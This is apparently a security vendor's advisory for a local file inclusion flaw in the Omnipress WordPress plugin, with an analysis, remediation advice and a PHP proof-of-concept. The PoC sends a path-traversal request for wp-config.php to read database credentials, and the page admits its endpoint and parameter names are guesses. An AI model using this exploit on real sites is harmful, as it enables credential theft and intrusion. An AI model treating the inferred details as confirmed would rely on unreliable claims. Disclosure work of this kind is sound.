Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24538: Omnipress <= 1.6.7 – Authenticated (Contributor+) Local File Inclusion (omnipress)

CVE ID CVE-2026-24538
Plugin omnipress
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 1.6.7
Patched Version
Disclosed January 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24538 (metadata-based):
The Omnipress plugin for WordPress, versions up to and including 1.6.7, contains an authenticated Local File Inclusion vulnerability. Attackers with contributor-level permissions or higher can exploit this flaw to include and execute arbitrary files on the server. This vulnerability directly impacts the plugin’s file handling component and has a high CVSS score of 7.5, indicating significant confidentiality, integrity, and availability impacts.

Atomic Edge research infers the root cause is improper validation of user-supplied input used in a PHP include or require statement. The CWE-98 classification confirms the plugin likely constructs a file path using attacker-controlled data without proper sanitization. This allows directory traversal sequences or absolute paths to be injected. The vulnerability description suggests the flaw may be reachable through an interface where users can upload or specify file names, such as an image or template management feature. These conclusions are inferred from the CWE and public description, as the source code is unavailable for direct confirmation.

Exploitation requires an authenticated session with at least contributor-level privileges. The attacker would likely send a crafted POST or GET request to a specific plugin endpoint, such as an AJAX handler or admin page. A probable attack vector is the `/wp-admin/admin-ajax.php` endpoint with an `action` parameter containing an Omnipress-specific hook. The malicious request would include a parameter, perhaps named `file` or `template`, containing a path traversal payload like `../../../wp-config.php` or a path to an uploaded file containing PHP code. This would cause the plugin to include and execute the specified file’s contents.

Remediation requires implementing strict validation and sanitization on any user input used for file operations. The fix must ensure user-supplied filenames are restricted to an allowed allowlist or are stripped of directory traversal sequences. The plugin should also enforce that included files reside within a specific, intended directory, typically the plugin’s own directory. Implementing proper capability checks for the specific function and adding nonce verification would provide additional defense-in-depth layers.

Successful exploitation leads to full server-side code execution within the context of the WordPress application. Attackers can read sensitive files like `wp-config.php` to compromise database credentials. They can also write web shells to the filesystem if file write permissions exist, leading to persistent backdoor access. This vulnerability bypasses standard access controls, enabling privilege escalation and complete site takeover.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24538 - Omnipress <= 1.6.7 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2026-24538.
 * ASSUMPTIONS: The vulnerable endpoint is an AJAX handler. The vulnerable parameter is named 'file'.
 * The AJAX action hook is derived from the plugin slug, 'omnipress'.
 * Contributor-level credentials are required.
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// File to include via path traversal
$malicious_file = '../../../../wp-config.php';

// Step 1: Authenticate to WordPress and obtain cookies/nonce.
// This PoC assumes a standard WordPress login and uses the REST API to get a nonce.
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Create a cURL handle for session persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Perform login via admin-ajax or wp-login (simplified example).
// In a real scenario, you would need to extract the login nonce from the form.
// This PoC skeleton shows the attack request structure post-authentication.

// Step 2: Craft the Local File Inclusion exploit request.
// The action is inferred as 'omnipress_action' or similar.
$post_fields = [
    'action' => 'omnipress_action', // INFERRED AJAX ACTION
    'file' => $malicious_file,      // INFERRED VULNERABLE PARAMETER
    // Other required parameters (e.g., nonce) may be needed but are omitted for the PoC skeleton.
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200 && !empty($response)) {
    echo "Potential LFI successful. Response snippet:n";
    echo substr($response, 0, 500) . "n";
    // Check for signs of wp-config.php content in the response.
    if (strpos($response, 'DB_NAME') !== false) {
        echo "CONFIRMED: Sensitive configuration file leaked.n";
    }
} else {
    echo "Exploit attempt failed or endpoint not vulnerable. HTTP Code: $http_coden";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School